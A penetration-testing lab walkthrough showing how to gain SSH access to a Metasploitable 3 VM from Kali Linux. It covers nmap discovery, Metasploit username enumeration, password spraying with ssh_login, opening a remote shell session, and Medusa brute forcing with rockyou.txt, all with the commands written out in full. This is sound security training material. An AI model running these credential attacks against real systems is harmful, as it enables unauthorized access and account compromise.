Gaining Access by Exploiting SSH

Mahran Al-Zyoud
|
15 steps

IT professionals often configure remote access services on networking devices, security appliances, and systems within their network to facilitate remote management. **Secure Shell (SSH)** is one of the most commonly used protocols for secure remote access. Operating in a client-server model, SSH ensures that all data exchanged between the client and the server is encrypted, offering a layer of security for remote connections. As a penetration tester, you can identify whether a target system is running an SSH service—typically on port 22, the default port—by performing a port scan. If SSH is active, you can attempt an **online password-based attack** to discover valid user credentials, enabling access to the remote device via an SSH session. While many organizations use the default port 22 for SSH, others opt for a non-standard port. This is a common practice within the industry to minimize the risk of threat actors easily identifying the SSH service on a targeted system using automated scanning tools. Changing the default port adds an additional layer of obscurity, though it should not be relied upon as the sole security measure.

Get the IP address of your Kali Linux (**172.17.2.25** in my case)

Get the IP address of the Metasploitable 3 VM (**172.17.2.23** in my case)

On Kali Linux, open Terminal and use the following commands to identify the IP address of Metasploitable 3 (Windows-based):\ [[nmap -sn 172.17.2.0/24 --exclude 172.17.2.25]]\ \ **Note**: exclude your Kali VM.

Next, use the following command to identify whether port 22 is open on the target:\ [[nmap -sV -p 22 172.17.2.23]] As shown in the following screenshot, Nmap has identified that port 22 is open on the target and it’s running an SSH service.

Next, start the Metasploit framework on Kali Linux: [[msfconsole]]

Once the Metasploit interface loads, use the following command to invoke an SSH enumeration module to help us identify valid usernames: [[use auxiliary/scanner/ssh/ssh_enumusers]]

Next, set the IP address of the targeted system: [[set RHOSTS 172.17.2.23]] Then, set a wordlist that contains a set of possible usernames and execute the module: [[set USER_FILE /usr/share/wordlists/metasploit/default_users_for_services_unhash.txt]] [[run]] As shown in the following screenshot, the SSH enumeration module was able to identify valid usernames that are accepted on the targeted system.

Next, create a text file with a list of all the valid usernames that were found and save it as **valid_users.txt**. We will use this wordlist to perform a password-spraying attack, in which a common password is used with different usernames.

Type the [[back ]]command to exit a module within Metasploit. Next, use the following commands to check which username from the **valid_users.txt** wordlist uses a common password on the targeted system: [[use auxiliary/scanner/ssh/ssh_login]]\ [[set RHOSTS 172.17.2.23]]\ [[set USER_FILE /home/kali/valid_users.txt]]\ [[set PASSWORD vagrant]]\ [[run]] As shown in the following screenshot, this Metasploit module was able to identify valid username and password combinations to log in to the targeted system using SSH.

Next, use the [[sessions]] command within Metasploit to view a list of all active sessions, as shown below.

Next, use the [[sessions -i <session-ID>]] command to interact with a specific session. As shown in the following screenshot, a **bind shell** was obtained, which enabled us to execute Windows-based commands remotely on the targeted system.

Next, let’s use **Medusa** to perform online password cracking to identify valid user credentials by attempting to gain unauthorized access via the SSH service on the target. [[medusa -h 172.17.2.23 -U /home/kali/Desktop/valid_users.txt -P /usr/share/wordlists/rockyou.txt -M ssh ]]